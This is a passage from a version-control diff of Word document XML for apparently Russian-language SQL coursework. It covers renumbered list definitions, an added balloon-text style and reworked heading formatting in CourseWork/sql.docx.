+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11">
     <w:nsid w:val="37DF13E3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4CA8544A"/>
@@ -31147,7 +34100,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10">
+  <w:abstractNum w:abstractNumId="12">
     <w:nsid w:val="3A773187"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="67ACC35A"/>
@@ -31233,7 +34186,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11">
+  <w:abstractNum w:abstractNumId="13">
     <w:nsid w:val="411E505D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="8B608042"/>
@@ -31382,7 +34335,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12">
+  <w:abstractNum w:abstractNumId="14">
     <w:nsid w:val="41E121B2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B352BED6"/>
@@ -31468,7 +34421,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13">
+  <w:abstractNum w:abstractNumId="15">
     <w:nsid w:val="426E4326"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A856976E"/>
@@ -31617,7 +34570,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14">
+  <w:abstractNum w:abstractNumId="16">
     <w:nsid w:val="45DF3509"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="ABFC7EBC"/>
@@ -31703,7 +34656,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15">
+  <w:abstractNum w:abstractNumId="17">
     <w:nsid w:val="48797C45"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="88EEB3A0"/>
@@ -31852,7 +34805,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16">
+  <w:abstractNum w:abstractNumId="18">
     <w:nsid w:val="4F2A4BD2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F2A69146"/>
@@ -31938,7 +34891,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17">
+  <w:abstractNum w:abstractNumId="19">
     <w:nsid w:val="4FD613C7"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="C2D2A376"/>
@@ -32087,7 +35040,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18">
+  <w:abstractNum w:abstractNumId="20">
     <w:nsid w:val="53942A10"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="83D85C80"/>
@@ -32176,7 +35129,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19">
+  <w:abstractNum w:abstractNumId="21">
     <w:nsid w:val="54C24DD3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BA363D50"/>
@@ -32262,7 +35215,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20">
+  <w:abstractNum w:abstractNumId="22">
     <w:nsid w:val="5CA32A3F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EF761446"/>
@@ -32348,7 +35301,93 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21">
+  <w:abstractNum w:abstractNumId="23">
+    <w:nsid w:val="60310280"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="0F5A5E48"/>
+    <w:lvl w:ilvl="0" w:tplc="0419000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="24">
     <w:nsid w:val="61153FB1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4B0683A2"/>
@@ -32434,7 +35473,93 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22">
+  <w:abstractNum w:abstractNumId="25">
+    <w:nsid w:val="65E13A6D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6194F0AE"/>
+    <w:lvl w:ilvl="0" w:tplc="0419000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="26">
     <w:nsid w:val="6CBC4191"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0DB8C92E"/>
@@ -32583,7 +35708,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23">
+  <w:abstractNum w:abstractNumId="27">
     <w:nsid w:val="6FD21E29"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="861C4C5C"/>
@@ -32669,7 +35794,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24">
+  <w:abstractNum w:abstractNumId="28">
     <w:nsid w:val="72EA3BA9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0C101CDA"/>
@@ -32755,80 +35880,181 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="29">
+    <w:nsid w:val="735258DD"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="BD808082"/>
+    <w:lvl w:ilvl="0" w:tplc="0419000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="8">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:num w:numId="14">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="15">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="18">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="19">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="20">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="21">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="22">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="23">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="23">
+  <w:num w:numId="24">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="25">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="24">
-    <w:abstractNumId w:val="7"/>
+  <w:num w:numId="26">
+    <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="25">
-    <w:abstractNumId w:val="4"/>
+  <w:num w:numId="27">
+    <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="28">
+    <w:abstractNumId w:val="29"/>
+  </w:num>
+  <w:num w:numId="29">
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="30">
+    <w:abstractNumId w:val="10"/>
   </w:num>
 </w:numbering>
 </file>
@@ -33258,6 +36484,36 @@
       <w:lang w:eastAsia="ru-RU"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="a9">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="aa"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00546FBD"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="aa">
+    <w:name w:val="Текст выноски Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a9"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00546FBD"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -33551,7 +36807,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{18D8D36C-A859-407A-84E1-E018F7CE3D6D}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{714269ED-0A86-4361-822C-99047188C7B1}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/CourseWork/sql.docx
+++ b/CourseWork/sql.docx
@@ -654,22 +654,20 @@
     </w:p>
     <w:sdt>
       <w:sdtPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
         <w:id w:val="172132631"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Table of Contents"/>
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:sdtEndPr>
       <w:sdtContent>
         <w:p>
           <w:pPr>
@@ -2102,9 +2100,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2114,6 +2113,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2123,6 +2123,7 @@
       <w:bookmarkEnd w:id="0"/>
       <w:bookmarkEnd w:id="1"/>
     </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:jc w:val="both"/>
@@ -2779,23 +2780,11 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="1"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
+          <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2805,6 +2794,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2814,6 +2804,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2823,6 +2814,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
@@ -2833,6 +2825,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -2841,6 +2834,7 @@
       <w:bookmarkEnd w:id="2"/>
       <w:bookmarkEnd w:id="3"/>
     </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:jc w:val="both"/>
@@ -3909,6 +3903,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>PriceID</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -3974,7 +3969,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>PriceID</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -4531,52 +4525,36 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="1"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="4" w:name="_Toc420429531"/>
       <w:bookmarkStart w:id="5" w:name="_Toc420429731"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+    </w:p>
+    <w:bookmarkEnd w:id="4"/>
+    <w:bookmarkEnd w:id="5"/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -4587,6 +4565,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
@@ -4597,25 +4576,17 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>-кода</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> с помощью </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-кода с помощью </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -4625,15 +4596,14 @@
       <w:r>
         <w:rPr>
